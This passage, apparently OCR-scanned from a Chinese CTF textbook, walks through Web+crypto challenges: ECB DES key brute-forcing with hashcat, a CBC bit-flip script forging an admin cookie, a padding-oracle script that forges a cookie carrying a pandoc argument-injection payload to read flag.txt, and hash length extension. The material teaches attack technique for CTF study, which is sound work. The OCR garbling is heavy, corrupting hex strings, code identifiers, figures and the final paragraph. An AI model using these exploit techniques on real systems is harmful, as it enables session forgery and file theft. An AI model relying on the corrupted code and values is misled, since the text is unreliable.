本 节 就 CTF 中 常见 的 Web+CRYPTO 或 Web 首 向 题目 进行 探讨 。 


3.3.1 密码 学 知识 


在 密码 学 与 Web 结 合 的 题目 中 往往 包含 明显 的 提示 ， 如 题目 的 关键 词 中 有 ENCRYPT、DECRYPT 等 ， 
甚至 直接 给 出 相关 代码 ， 让 参赛 者 进行 分 析 。 


3.3.1.1 分 组 加 密 


分 组 加 密 束 是 将 一 个 很 长 的 字符 串 分 成 才干 固定 长 度 (分 组 长 度 ) 的 字符 串 ， 每 块 明 文 再 通过 一 个 与 
分 组 长 度 等 长 的 密 钥 进行 加 密 ， 将 加 密 的 结果 进行 拼接 ， 最 终 得 到 加 密 后 的 结果 。 当 然 ， 在 分 组 过 程 
中 ， 块 的 长 度 不 一 定 是 分 组 长 度 的 整数 倍 ， 所 以 需要 进行 填充 ， 让 明文 变 为 分 组 长 度 的 整数 倍 。 这 个 
填充 的 过 程 刚 好 可 以 帮助 我 们 识别 分 组 加 密 。 


3.3.1.2 加 密 方式 的 识别 


在 分 组 加 密 方式 中 ， 加 密 过 程 中 明文 会 被 分 为 若干 等 长 的 块 。 随 着 明文 长 度 的 增加 ， 密 文 的 长 度 可 能 
不 变 , 或 一 次 增加 固定 的 长 度 ， 而 这 个 增加 的 长 度 就 是 在 分 组 加 密 中 使 用 到 的 密 钥 的 长 度 。 这 类 题目 
中 常见 的 加 密 算法 有 AES 和 DES 两 种 。 其 中 ，DES 的 分 组 长 度 固定 为 64 比 特 ， 而 AES 有 AES-128、 A 
-192、AES-256 三 种 。 由 此 可 以 初步 判定 加 密 时 使 用 的 算法 是 哪 一 种 ， 再 根据 题目 提供 的 信息 对 密 
钥 进行 爆破 ， 或 者 配合 其 他 攻击 方式 伪造 密 文 。 


在 分 组 加 密 中 有 ECB、CBC、CFB、PCBC、OFB、CTR 六 种 模式 ， 对 每 种 模式 的 加 密 的 区 别 可 以 参考 
密码 学 部 分 ， 下 面 将 通过 对 其 中 三 种 加 密 方式 和 相应 例题 来 介绍 这 类 题目 中 常 包 含 的 套路 。 


3.3.1.3 ECB 模 式 


ECB (Electronic CodeBook， 电 子 密码 本 ) 模式 的 工作 流程 图 见 图 3-3-1 和 图 3-3-2。 


在 加 密 过 程 中 ， 需 要 加 密 的 消息 ， 按 照 分 组 大 小 被 分 为 数 个 块 ， 表 使 用 密 钥 对 若干 块 明文 分 别 加 密 ， 
将 加 密 结果 拼接 后 得 到 密 文 。 解 密 过 程 类 似 。 这 种 加 密 方式 最 大 的 问题 就 是 对 所 有 分 块 使 用 同样 的 密 
钥 进 行 加密 ， 知 明文 相同 ， 则 产生 的 密 文 也 相同 。 所 以 ， 针 对 ECB 这 种 加 密 方式 ， 我 们 只 需 关 注 某 一 
组 已 知 可 控 的 明文 及 对 应 的 加 密 结果 ， 即 可 对 其 余 加 密 块 进行 攻击 。 


这 里 以 HITCON 2018 Oh My Reddit 为 例 进行 讲解 。 题 目 代 码 请 参考 : https://github.com/ 


orange 
/My-CTF-Web-Challenges/tree/master/hitcon-ctf-2018/0h-my-raddit/src。 
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Block Cipher Block Cipher Block Cipher 
Key 一 ~| Encryption Key —» | Encryption Key 一 -~| Encryption 


EEELLEEE EEEDELEEE) EL TI 
Ciphertext Ciphertext Ciphertext 


Electronic Codebook (ECB) mode encryption 


Ciphertext Ciphertext Ciphertext 
bs GEECELEL} 


Block Cipher Block Cipher Block Cipher 
Key —» | Decryption Key 一 ~ Decryption Key —»| Decryption 


BLLEEEGE GEGEGGEEDS EL 
Plaintext Plaintext Plaintext 


Electronic Codebook (ECB) mode decryption 


根据 提示 ，flag is hitcon{ENCRYPTION KEY}， 我 们 可 以 得 知 这 是 一 道 密码 与 Web 相 结合 的 题 
目 ; 再 查看 hint 界 面 ， 提 示 


密 钥 都 是 小 写字 符 。 


查看 题目 中 涉及 的 链接 和 对 应 的 明文 不 难 发 现 ， 随 着 title 长 度 的 变化 ， 每 次 密 文 在 产生 长 度 变 化 时 都 
变化 了 16 个 字符 ， 由 此 可 以 推断 出 密 钥 的 长 度 为 64bit， 加 密 方式 可 能 为 DES。 


我 们 发 现 了 网 页 中 两 条 很 有 趣 的 链接 ， 这 两 条 链接 中 title 开 头 的 字符 目 都 是 “Bypassing W”， 而 密 
文中 也 存在 相同 的 “1d8feb029243ed633882b1034e878984”: 


<a href="?s=4b596c43212b27b7c9483969491293dd24f6f5f3b635ddb984clc23f162d392ccf9969061d8b633877 
1d8feb929243ed633882b1934e8789849136472bd93ffe2dfd8017786de53c1785a67bbbcecad1lc78b696aa66 
c3ff957aaa3bb913d35c75f">Bypassing Web Cache Poisoning Countermeasures</a> 
<a href="?s=b0b7a350f4audf27848b264d656b25fbgf785e6357390b3bc73bbbbffc6bf5071b47143699fe718f2 
233b2d964a4138bbfedbcb8834342601d2446egf6d464355833f3b6c3 
9beeelbfd5d3bce98966879">Bypassing WAFs and cracking XOR with Hackvertor</a> 


可 以 猜想 加 密使 用 的 模式 为 ECB 模 式 (因为 开头 及 结尾 均 不 同 的 情况 下 ， 对 相同 字符 串 的 加 密 结果 相 
同 ) 。 那 么 ， 根 据 我 们 现在 的 已 知 信息 : 


他 密 钥 的 长 度 为 64bit，8 字 符 ， 可 能 为 DES 加 密 方式 。 
密 钥 中 的 字符 均 为 小 写字 符 。 


他 对 “Bypassing W” 中 某 8 个 字符 的 加 密 结果 可 能 为 “3882b1034e878984” 。 


我 们 可 以 党 试 爆破 密 铀 。 因 为 388...984 串 出 现在 后 面 ， 也 应 该 以 8 位 为 窗口 ， 倒 着 将 “Bypassing 
W” 作 为 明文 进行 爆破 ， 即 按照 "assing+W"、"passing+”( “+” 是 因为 将 title 进 行 了 URL 编 码 ) 的 
顺序 进行 尝试 。 


我 们 使 用 hashcat 工 具 : 


> hashcat64.exe -m 14000 3882b1034e878984:617373696e672b57 -a 3 ?L?L?L?L?L?L?L?L -force 
hashcat (v4.2.1) starting... 


Minimum password Length supported by kernel: 8 
Maximum password length supported by kernel: 8 


3882b1934e878984:617373696e672b57:Ldgonaro 


命令 中 的 “617373696e672b57” 是 将 "assing+W" 转 化 为 HEX 编 码 后 的 结果 。 运 行 结束 后 ， 我 们 得 
到 了 一 个 可 能 的 密 钥 “ldgonaro”。 使 用 这 个 密 钥 对 密 文 进行 解密 : 


from Crypto.Cipher import DES 

import binascii 

key = 'Ldgonaro' 

cipher = DES.new(key, DES.MODE_ECB) 

ciphertext = binascii.unhexLify(b"2e7e3605f2da618a2cf8298falfefc238522c932a276554e5f8985ba33f96 
99b361c3c95652a912b6342653ddcdc4763e5975bd2ff6cc8al33ca925409eb2d6a42") 

print(cipher.decrypt(ciphertext)) 

# b'm=d&f=upLoads%2F79c97cc1l-979f-4d91-8798-f36925eclfd7.pdf\x98\x08\x98\x98\x98\x98\x98\x98 ' 

plaintext = b'm=d&f=app.py' 

padding = abs(8-(len(plaintext)%8)) 
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plaintext = plaintext + bytes([padding]) * padding 
print(plaintext) 

# b'm=d&f=app.py\xO4\xO4\xO4\xQ4' 
print(binascii.hexlify(cipher.encrypt(plaintext))) 
# b'e2272b36277c708bc21066647Tbc21d4b8' 


解密 成 功 且 内 容 有 意义 ， 可 以 认为 密 钥 正确 。 但 是 我 们 按照 格式 提交 flag 后 ,提示 错误 。 表 观察 
题目 ， 其 中 有 文件 下 载 相 关 链 接 ， 通 过 分 析 该 链接 ， 我 们 可 以 实现 任意 文件 下 载 。 下 载 app.py 进 
行 分 析 ， 最 终 得 到 密 钥 。 


$ curl http://LocaLhost:8980/?s=e2272b36277c768bc21666647bc214b8 


import urllib 
import urlparse 
from Crypto.Cipher import DES 


web.config.debug = False 
ENCRPYTION_KEY = 'megnnaro' 


3.3.1.4 CBC 模 式 


CBC (Cipher Block Chaining, ER 中 ， 每 块 明文 都 需要 与 前 一 块 密 文 进行 异 或 ， 再 进 
行 加 密 ， 最 后 将 得 到 的 加 密 后 的 密 文 块 进行 拼接 ， 得 到 最 终 的 密 文 串 。 这 就 使 得 在 CBC 加 密 过 程 中 ， 
对 每 块 明文 进行 加 密 时 要 依赖 前 面 的 所 有 明文 块 ， 同 时 通过 IV (Initialization Vector， 初 始 向 量 ) 保 
证 每 条 消息 的 唯一 性 ， 其 工作 流程 见 图 3-3-3 和 图 3-3-4。 


Es ET ET 


ee Vector Ee 


as Block ES Block ee 
Enc pe” [| tion 


a ER 人 


Cipher Block Chaining (CBC) mode encryption 


图 3-3-3 (来 自 维基 百科 ) 


en Vector (IV) 站 ei ee 


Block | Block ee | ro 
Key 一 一 ~ 全 于 Key 一 一 ~ ee ee 


ee ee ee 


Cipher Block Chaining (CBC) mode decryption 


图 3-3-4 (来 自 维基 百科 ) 


由 于 IV 和 密 文 块 直接 参与 了 异 或 解密 的 过 程 ， 就 导致 了 在 出 题 过 程 中 常见 的 两 种 攻击 方式 : 通过 IV 
影响 第 一 个 明文 分 组 ; 通过 第 /个 密 文 分 组 影响 第 7+1 个 明文 分 组 。 


根据 解密 流程 ， 假 如 修改 第 7 个 分 组 解密 后 的 结果 ， 设 P_n 代 表 第 /组 明文 ，c_n 代 表 第 /组 密 文 ，dec 
(key，c) 为 解密 算法 ，key 为 密 铀 。 代 码 如 下 : 


n-1_modify 


如 果 想 修改 革 -组 的 解 窗 结 二 宋 ， ， 只 需 知道 原来 的 明文 是 什么 想 修 改 的 明文 内 容 、 上 一 组 向 后 传递 的 
密 文 即 可 ( 若 为 第 一 组 ， 则 需要 IV) 。 


这 里 以 PicoCTF 2018 的 Secure Logon 题 目 为 例 ， 题 目 中 提供 了 服务 器 端的 代码 : https://github. 


CO 
/shiltemann/CTF-writeups-public/blob/master/PicoCTF 2018/writeupflles/server_noflag. 


。 在 /flag 路 由 下 ， 只 有 获取 Cookie 中 保存 的 由 AES 加 密 后 的 JSON 串 ， 且 admin 字 段 为 1 的 情况 下 
才 会 将 flag 显 示 到 页 面 中 。 


@a oute /flag', methods=['GET']) 
request .cookies['cookie'] 
"Error: Please log-in again.") 
ardirarnt (irl farf main! ll 
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本 号 和 本 本 本 
data = AESCipher(app.secret_key).decrypt(encrypted) 
data = json.loads(data) 
外 有 
check = data['admin'] 
except KeyError: 
check = 0 
if check == 1: 
return render_template('flag.html', value=flag_value) 
flash("Success: You logged in! Not sure you'll be able to see the flag though.", "success") 
return render_template('not-flag.html', cookie=data) 


/login 路 由 中 则 给 出 了 Cookie 的 生成 算法 : 


@app.route('/Login'，methods=['GET'，'P0ST']) 
def login(): 
if request.form['user'] == 'admin' : 
message = "I'm sorry the admin password is super secure. You're not getting in that way." 
category = 'danger' 
flash(message, category) 
return render_template('index.html') 
resp = make_response(redirect("/flag")) 


cookie = {} 

cookie['password'] = request.form['password'] 
cookie['username'] = request.form['user'] 

cookie['admin'] = 0 

print(cookie) 

cookie_data = json.dumps(cookie, sort_keys=True) 

encrypted = AESCipher(app.secret_key).encrypt(cookie_data) 
print(encrypted) 

resp.set_cookie('cookie', encrypted) 

return resp 


其 中 使 用 的 加 密 算法 为 : 


class AESCipher: 
ne 


Usage: 
c = AESCipher('password').encrypt('message') 
m = AESCipher('password').decrypt(c) 

Tested under Python 3 and PyCrypto 2.6.1. 

Wi 


def __init__(self, key): 
self.key = md5(key.encode('utf8')).hexdigest() 


def encrypt(self, raw): 
raw = pad(raw) 
iv = Random.new().read(AES.block_size) 
cipher = AES.new(self.key, AES.MODE_CBC, iv) 
return b6Hencode(iv + cipher.encrypt(raw)) 


def decrypt(self, enc): 
enc = b6ddecode(enc) 
iv = enc[:16] 
cipher = AES.new(self.key, AES.MODE_CBC, iv) 
return unpad(cipher.decrypt(enc[16:])).decode('utf8') 


通过 对 login 函 数 及 AESCipher 的 分 析 ， 我 们 可 以 知道 : 使 用 的 AES-128-CBC 加 密 算法 ; Cookie 中 的 
内 容 为 base64 (iv，data) ; data 为 json.dumps (cookie) 的 结果 ; Cookie 中 包含 {"admin": 
0，"username": "something"，"password": "something"}， 并 按 key 字 母 序 进行 了 排序 。 


为 了 达成 admin 为 1， 我 们 需要 进行 CBC 比 特 翻 转 攻 击 。 


根据 json.dumps 的 结果 ， 可 知 需 要 修改 的 字符 位 于 整个 加 密 字符 串 的 第 11 位 ， 将 其 从 0 变 为 1。 


import json 

data = {"admin": ©0, "username": "something", "password": "something"} 
print(json.dumps(data, sort_keys=True)) 

# {"admin": 0, "password": "something", "username": "something"} 


根据 分 组 长 度 为 16， 我 们 可 以 得 知 要 翻转 的 字符 位 于 第 一 组 第 11 位 。 


根据 公式 ， 我 们 开始 进行 翻转 攻击 。 所 需要 的 IV 已 经 保存 在 Cookie 中 base64 解 密 结果 的 前 16 位 中 。 
那么 ， 我 们 需要 的 所 有 信息 都 已 经 满足 ， 开 始 写 程序 翻转 : 


from Crypto.Cipher import AES 

import binascii 

import base64 

import json 

ciphertext = "9pocvdCvNFjgoMwCKqxkMvF2a8Pu0srFeGDeVogqt5/tAnSgXYhKpNr987gehJLuM92u8PpaXXiIi 
MPf1YQQ9o96m+EjuIfk8wYgqUF3GoTnHQ=" 

ciphertext = base64.b64decode(ciphertext) 

ciphertext = list(ciphertext) 


ciphertext[10] = ciphertext[10] ^ ord('6') ^ ord('1') 
print(base64.b6dencode(bytes(ciphertext))) 


# b'QpocvdCvNFjOMwGKqxkMvF2a8PuOsrFeGDeVoQqt5/tAnSgXYhKpNr@87gehJLuM92u8PpaXXiMPf1lYQQ90o 
Q6m+EjuIfk8wYgqUF3GoTnHQ=" 


将 翻转 后 的 Cookie 进 行 蔡 损 ， 即 可 成 功 拿 到 flag。 
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3.3.1.5 Padding Oracle Attack 


Padding Oracle 是 Padding 根 据 服 务 器 对 信息 解密 时 的 表征 来 对 应 用 进行 攻击 ， 针 对 的 同样 是 CBC 
加 密 模式 ， 其 中 的 关键 是 Padding 的 使 用 。 在 分 组 加 密 中 ， 需 要 先 将 所 有 的 明文 串 分 成 若干 固定 长 度 
的 分 组 ， 为 了 满足 这 样 的 需求 ， 要 求 我 们 对 明文 进行 填充 ， 将 其 补充 为 完整 的 数据 块 。 


在 填充 时 有 多 种 规则 ， 其 中 最 常见 的 是 PKCS # 5 标准 中 定义 的 规则 ， 即 当 明 文中 最 后 一 个 数据 块 包含 
NAOHASAIN BMS EO D3 EE EA 
填充 块 ， 也 就 是 说 : 需要 补 苑 1 个 数据 块 时 ， 补 充 01; 需要 补充 2 个 数据 块 时 ， 补 充 02.….. 当 字符 捉 长 
度 正好 为 分 组 长 度 的 整数 倍数 时 ， 额 外 添加 一 个 块 ， 内 容 为 Padding， 见 图 3-3-5。 


一 一 [一 一 一 一 
_ ExtPetded) | "| :| 。| 于 加 当当 可 加 训 匡 


EC EDEN ES EN EY | | | EN HS EN WS WN 
_ Bx2Potsed) | Ta Twas) 号 加 内 


解密 时 ， 服 务 器 将 数据 解密 后 ， 在 判断 最 后 一 个 数据 块 末 尾 的 Padding 是 否 合 法 时 ， 可 负 因 为 
出 现 的 错误 而 抛 出 填充 异常 ， 束 是 给 攻击 者 对 加 密 进行 攻 击 时 的 Oracle (提示 ) 。 一 般 的 Web 应 
用 会 将 |IV 和 加 密 后 的 字符 串 一 同 交 还 给 客户 端 作 为 凭据 ， 用 于 以 后 对 客户 身份 的 验证 时 使 用 。 这 里 以 
P.W.N.CTF 2018: Converter 为 例 ( 见 图 3-3-6) ， 题 目地 址 : http://converter.uni.hctf.fun/， 主 
要 功能 是 为 用 户 输 入 一 个 字符 串 ， 通 过 服务 器 的 转换 器 将 该 格式 的 文档 转换 为 其 他 格式 。 注意， 转换 
Markdown 时 使 用 的 为 pandoc， 可 能 存在 命令 注入 的 漏洞 。 在 完成 输入 后 ， 服 务 器 返回 一 串 


@le7e] .<I 


vaLs=47469dcg9fb1l3fe473e540ac958fce3a517160fa8170a3759c7f28afd6b43f7b4ba6a691b23da63768clf6e 
82ee6b98f47f6e49f6c16dcgc292f5b5c5ed99113cc629d16e13c5279ab121cbe98ec83600221 


对 这 段 cookie 进 行 修改 ， 友 现 : 在 修改 字符 串 的 最 后 一 位 时 ， 提 示 “ValueError: Invalid padding 
bytes.” ;在 修改 字符 串 的 最 开始 一 位 时 ， 提 示 “JSONDecodeError: Expecting value: line 1 | 
column 
1 (char 0) ”; 不 进行 修改 上 时， 页面 返回 正常 ， 见 图 3-3-7。 


由 于 输入 相同 的 内 容 时 ， 返 回 的 vals 的 值 不 同 ， 我 们 可 以 推测 用 于 加 密 的 算法 采用 的 加 密 模式 为 CBC 
模式 。 在 逐步 增加 传 入 的 内 容 的 长 度 时 ,我们 友 现 ， 返 回 的 vals 的 长 度 在 友 生 变化 时 ， 变化 的 长 度 为 

， 所 以 可 以 确定 加 密 方式 是 128-CBC 方 式 。 根 据 这 些 内 容 ， 我 们 可 以 尝试 Padding Oracle 攻 击 ， 恢 
复明 文 。 因 为 在 CBC 模 式 进行 解密 时 需要 一 个 IV， 且 服务 器 只 返回 了 我 们 一 个 vals， 所 以 我 们 可 以 先 
假设 第 一 个 分 组 为 V， 后 续 信 息 为 加 密 结果 


在 题目 的 场景 中 ， 根 据 应 用 程序 的 提示 ， 我 们 可 以 判断 出 一 个 加 密 字 符 串 的 填充 是 否 正确 ， 同 时 可 以 
对 该 应 用 进行 Padding Oracle 攻 击 。 


那么 ， 在 本 题 中 ， 我 们 可 以 认为 服务 器 返回 的 信息 与 明文 | 介 有 对 应 关系 ， 见 图 3-3-8。 
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由 于 我 们 不 知道 明文 的 内 容 ， 图 中 明文 都 用 '? ' 进 行 代替 。 但 是 不 难 推测 ， 最 后 一 个 block 中 一 定 包 合 
一 个 合法 的 Padding.。 


Convert your Dissertation (for free) 
from: [Markdown pandog 


to: IHTML 4 


Content:! 5- 

| Send | 

*Content is truncated after 500 characters. If your dissertation is longer just split it up into multiple 
files. 


Successl 


Here Is your converted data- 


<P>AAAAAAAAAAAAAAAAAAAAAA<V/pP> 


INITIALIZATION VECTOR 
6 7 8 9 10 11 12 13 14 15 16 
IPlainText |@x??| ex??|ex??| ex?? |@x?? | ex?? | ex??| ex??| ex??| ex??| @x?? | ox?? | @x?? | ex??| ex??| ex??| 
IPlain- Text(Padded) | ex??| ex?? | ex??| ex??| ex??| ex??| ex??| ex??| ex??| ex??| @x?? | ex?? | ex??| ex??| @x?? | ox22 
IEncryptedValue (HEX) | ex47 | ex48 | exdc | exef | exbl | ex3f| exe4 | ex73| exe5 | ex48 | exac | ex95 | ex8f| exce| ex3a | ex51 








- 4 9 10 11 12 13 14 15 
Eneyptedvalue(HE | @01 | exor | oxas | ox17 [oxea [037 | 0xs9 | oxe7 | 0xr2 | oxsa | ora | exeo | xs3 | xr7| oxs | ova) 


16 


8 9 10 


11 12 13 14 15 16 
[Ps | rr sc FS Cr 
A 


lain-Text(Padded) ?| x3? | ex?? | ox?? | ox?? | ex?? | ex?» | ox?? | ox?? | Ox?> 
EncryptedValue(HEX) | ex9d | ex16 | @xe1 | ex3c | ex52 | ex79 | exab | exa2 | | 


在 CBC 模 式 的 解密 过 程 中 ， 对 最 后 一 个 分 组 加 密 、 解 密 的 流程 见 图 3-3-9 和 图 3-3-10， 符 号 @ 代 表 异 
或 。 


在 了 解 了 CBC 万 式 对 字符 串 如 何 进 行 解密 及 Padding 的 规则 后 ,我们 可 以 利用 Padding Oracle 对 这 着 
题 被 加 密 的 明文 进行 恢复 。 至 于 原理 ， 我 们 以 其 中 某 个 加 密 块 为 例 进 行 讲解 。 选 取 第 一 块 ， 注 意 第 一 
块 在 进行 异 或 时 操作 数 为 V， 之 后 的 块 在 进行 异 或 时 ， 操 作 数 为 前 一 个 密 文 块 。 为 了 操作 方便 ， 只 对 
NAN) NE AR 
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elelel| [elele|l||lelsle| [elele) 
图 3-3-10 
通过 将 Cookie 设 置 为 
VvaLs=00000000000000000000000000000000710fa8170a3759c7f28afd6b43f7b4ba 


行 访 问 ， 服 务 器 返回 ValueError: Invalid padding bytes。 因 为 在 使 用 0 作为 IV 进 行 解密 后 ， 解 密 
BE i 而 导致 解密 过 程 中 出 现 填充 异常 ， 见 图 3-3-11。 


时 国医 到 区 澡 区 沁 区 到 区 到 区 当 医 到 区 光 区 浊 区 到 医 汪 区 弹 芝 到 区 泗 区 到 
i 
ST 


名 3-3-11 
通过 变化 IV， 使 最 终 得 到 的 解密 结果 的 字 节 进行 变化 ， 当 IV+1 即 Cookie 为 


vals=00000000000000000000000000000001710fa8170a3759c7f28afd6b43f7bd4ba 


时 ,虽然 依 旧 返 回 500 错 误 ， 但 服务 器 解密 出 的 明文 的 结果 已 经 友 生 了 变化 ， 见 图 3-3-12。 


I 
vvlyvlvlvlvvlvvlvlvlvlvlvlvlyvl vv | 
J 
图 3-3-12 
由 于 IlV 的 变化 ， 服 务 器 完成 解密 时 最 终 字 符 串 的 内 容 变化 为 0x3C。 如 此 重复 ， 直 到 解密 出 的 明文 的 最 
1 字 节 为 0x01，Cookie 的 内 容 如 下 


vals=000000000000000900000000000090072710fa8170a3759c7f28afd6b43f7bd4ba 


则 服务 器 返回 “JSONDecodeError: Expecting value: line 1 column 1 (char 0) ”， 而 不 是 由 友 
生 填 充 错误 导致 的 “ValueError: Invalid padding bytes.”。 此 时 可 以 推测 最 后 一 个 字符 为 0x01， 
满足 了 Padding 的 要 求 ， 见 图 3-3-13。 根 据 异 或 的 计算 过 程 和 CBC 解 密 的 济 程 ， 我 们 可 以 知道 


If [Intermediary Byte] ^ 9x72 == Qx01, 
then [Intermediary Byte] == 9x72 ^ 9x91， 
so [Intermediary Byte] == 9x73 


也 融 是 把 对 第 一 个 密 文 块 进行 解密 后 的 中 间 值 的 内 容 为 0x73。 


在 正常 解密 流程 中 ， 该 字符 与 原 IV 中 同样 位 置 的 字符 进行 异 或 运算 ， 运 算 后 的 值 为 最 终 的 解密 结果 。 
所 以 0x73 xor 0x51=0x22 (hex 解 码 后 为 ") ， 即 原来 的 明文 字符 串 中 的 值 。 


和 
el|elelielelelelielelelelelelelele 
图 3-3-13 
现在 我 们 已 经 知道 了 最 后 1 字 节 在 解密 后 的 中 间 结 果 。 通 过 修改 IV， 我 们 可 以 使 最 后 1 字 节 在 异 或 后 的 
最 终结 果 为 0x02， 那 么 此 时 由 于 倒数 第 二 个 字符 解密 结果 不 满足 Padding 规 则 ( 见 图 3-3-14) ， 服 


务 器 会 再 次 返回 500 错 误 。 


Ee 


iLyliylilylyliLylilLylllLyliyivyiliLllLlllllilyl 
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lelelelelslele lalels lelelelele 
区 要 区 习 区 玉 区 六 区 涩 区 区 六 区 汶 区 区 六 区 六 区 济 区 泗 欧 济 诡 河 脆 
2 


INVALID PADDING 


图 3-3-14 
那么 ， 依 旧 逐 步 修 改 IV， 使 最 终 解密 的 结果 为 0x02， 正 确 填 序 时 ( 见 图 3-3-15) ，Cookie 如 下 所 示 


vals=0000000990000690000909000090005671710fa8170a3759c7f28afd6b43f7b4ba 


ld blr re er 
TT 
elelelelelelelelelelelselelelele 
联 局 诛 光 攻守 匠 基 区 届 芒 凋 芭 基本 亲本 轴 医 沁 攻 油 区 贡 区 局 区 忆 区 世 区 习 管 。 1 


图 3-3-15 此 时 ， 根 据 类 似 的 计算 过 程 ， 可 以 还 原 倒数 第 二 位 的 内 容 : 


If [Intermediary Byte] ^ 9x56 == 0x02, 
then [Intermediary Byte] == 9x56 ^ 9x92， 
so [Intermediary Byte] == 9x54， 

then [Plaintext] == Qx54 ^ Qx3a 

so [Plaintext] == 0x6e (hex 解码 后 为 'n') 


如 此 重复 ， 直 到 填充 字符 捉 的 长 度 为 整个 块 的 长 度 ， 此 时 我 们 可 以 还 原 第 一 个 块 的 全 部 内 容 ， 见 图 3- 
3-16。 


图 3-3-16 
再 根据 CBC 蛋 式 的 解密 规则 ， 在 解密 过 程 中 ， 解 密 时 产生 的 中 间 结 果 不 受到 IV 的 影响 。 此 时 将 第 二 个 
密 文 块 直接 拼接 至 置 0 的 IV 序 列 后 ， 按 照 类 似 的 步骤 ,但 在 异 或 得 到 明文 时 ， 需 要 与 前 一 个 密 文 块 对 
应 位 置 的 值 进行 异 或 ， 这 样 可 以 完成 对 第 二 个 密 文 块 进行 破 解 。 如 此 反复 ,最终 恢 复 整 个 明文 。 


根据 第 二 部 分 CBC 模 式 加 密 解 密 的 原理 ， 在 已 知 明文 、 密 文 、 目 标明 文 、IV 时 ， 我 们 可 以 构造 任意 字 
符 串 ， 此 时 可 以 将 需要 的 命令 注入 cookie， 即 将 


"Mec": VAAAAAAAAAAAAAAAAAAAAAA", "t": "htmLd"} 


在 修改 的 过 程 中 ， 需 要 从 最 后 一 个 密 文 块 开始 伪造 。 在 伪造 时 ， 它 的 前 一 个 密 文 块 解密 后 的 内 容 也 会 
改变 。 由 于 Padding Oracle 的 存在 ,我 们 可 以 获得 修改 后 的 密 文 块 解密 时 的 中 间 结 果 ， 从 而 依次 同 前 
推进 ， 完 成 对 任意 字符 串 的 伪造 。 


原理 介绍 完毕 ， 但 是 为 了 方便 解 题 ， 可 以 使 用 https://github.com/pspaul/padding-oracle 中 提 
供 的 工具 ， 仪 需 修 改 小 部 分 代码 ， 即 可 实现 全 部 功能 。 


针对 本 题目 所 编写 的 代码 如 下 : 
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from padding_oracle import PaddingOracle 
from optimized_alphabets import json_alphabet 
import requests 


def oracle(cipher_hex): 
headers = {'Cookie': 'vals={}'.format(cipher_hex)} 
Fr = requests.get('http://converter.uni.hctf.fun/convert', headers=headers) 
response = r.content 


if b'Invalid padding bytes.' not in response: 
return True 

else: 
return False 


0 = PaddingOracle(oracle, max_retries=-1) 


cipher = '4740dcgfb13fe473e540ac958fce3a51710fa8170a3759c7f28afd6b43f7budba6a01b23da63768 
clf6e82ee6b98fyTf6edOfF6c16dcOc202f5b5c5ed99113cc629dl6e13c5279ab1l21cbeQ8ec83600221' 

plain, _ = o.decrypt(cipher, optimized_alphabet=json_alphabet()) 

print('PLaintext: {}'.format(plain)) 


plain_new = b'{"f": "markdown -A flag.txt", "c": "AAAAAAAAAA", "t": "html4"}' 


cipher_new = o.craft(cipher, plain, plain_new) 

print('Modified: {}'.format(cipher_new)) 

# Modified: 2b238f593152e2elea5ab37eb0826fca642bldde7al7bf439a83e087d28d7ee1097ad35ea6376 
8clf6e82ee6b98f47f6e49f6c16dc9c292f5b5c5ed99113cc629d16e13c5279ab121cbe08ec83600221 


3.3.1.6 Hash Length Extension 


在 Web 中 ， 密 码 学 的 应 用 除了 加 密 还 有 签名 。 当 服务 器 端 生成 一 个 需要 保存 在 客户 端的 凭据 时 ， 正 确 
使 用 哈 希 函数 可 以 保证 用 户 伪 造 的 敏感 信息 不 会 通过 服务 器 的 校 验 而 对 系统 的 正常 运行 造成 影响 。 
希 尔 数 很 多 en 如 MD5、SHA1、SHA256 等 ， 在 错误 使 用 的 情况 下 ， 
算法 会 受到 哈 希 长 度 扩 展 攻 击 (Hash Length Extension，HLE) 的 影响 。 


首先 ，HLE 适 用 的 加 密 情况 为 Hash (secret+message) ， 这 时 虽然 我 们 不 知道 secret 的 内 容 ， 但 是 
依旧 可 以 在 message 后 拼接 构造 好 的 payload， 发 给 服务 器 ， 并 通过 服务 器 的 校 验 。 要 理解 这 种 攻击 
手法 ， 我 们 需要 对 Hash 算 法 有 了 解 。 这 里 以 SHA1 为 例 ， 在 加 密 时 ， 我 们 需要 关注 的 有 三 个 步骤 ( 具 
体 算 法 请 见 密码 学 部 分 ) : 


(1) 对 信息 进行 处 理 


在 SHA1 算 法 中 ， 算 法 将 输入 的 信息 以 512bit 为 一 组 进行 处 理 ， 这 时 可 能 出 现 不 足 512bit 的 情况 ， 就 
需要 我 们 对 原 信息 进行 填充 。 填 充 时 ， 在 该 数组 的 最 后 填 上 一 个 1， 再 持续 填 入 0， 直 到 整个 消息 的 长 
度 满足 length (message+padding) %512=448。 这 里 之 所 以 是 448， 因 为 我 们 需要 在 消息 的 最 后 
补充 上 该 信息 的 长 度 信息 ， 而 这 部 分 的 长 度 64bith0n 上 之 前 的 448bit 刚 好 能 作为 一 个 512bit 的 分 组 。 


(2 ss Bs 


MD 算法 中 ， 最 后 一 个 分 组 用 来 填写 长 度 ， 这 也 正 是 SHA1 算 法 能 够 处 理 的 信息 的 长 度 不 能 超过 2^64 
bit 长 度 的 原因 。 


(3) 计算 hash 


在 计算 信息 摘要 时 ， 在 补 位 完成 后 的 信息 中 取出 512bit 进 行 哈 希 运算 。 在 运算 时 ， 有 5 个 初始 的 链接 
变量 A=0x67452301，B=0xEFCDAB89，C=0x98BADCFE，D=0x10325476，E=0xC3D2E1F0， 
用 来 参与 第 一 轮 的 运算 。 在 第 一 轮 的 运算 后 ，A、B、C、D、E 会 按照 一 定 规则 ， 更 新 为 经 过 当前 轮 的 
计算 后 ， 哈 希 消 数 得 出 的 结果 。 也 残 是 说 ， 在 每 轮 运算 后 ， 得 出 的 结果 都 会 作为 下 一 轮 的 初始 值 而 继 
续 运 算 。 重 复 该 过 程 ， 直 到 对 全 部 信息 分 组 完成 运算 ， 输 出 Hash 计 算 的 结果 ， 也 残 是 SHA1 值 。 


对 于 题目 中 可 能 出 现 的 Hash (secret+message) 方式 ， 服 务 器 一 般 会 将 Hash 运 算 的 结果 即 Hash 
(secret+message+ 原 填充 + 原 长 度 ) 的 结果 友 给 客户 端 。 那 么 ， 现 在 只 需要 猜 对 secret 的 长 度 ， 
完成 填充 及 补 长 度 的 过 程 ， 就 可 以 在 不 知道 secret 的 情况 下 得 到 Hash 函 数 某 一 轮 计算 的 中 间 结 果 ， 即 
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对 Hash (secret+ messa e+ 原 填充 + 原 长 ayload) 运算 时 ， 刚好 处 理 元 pa load 之 前 一 个 分 组 
内 是 | 汪 -信守 中 向 当 疆 丰 包谷 车 关 时 加 疙 这 就 导 在 在 


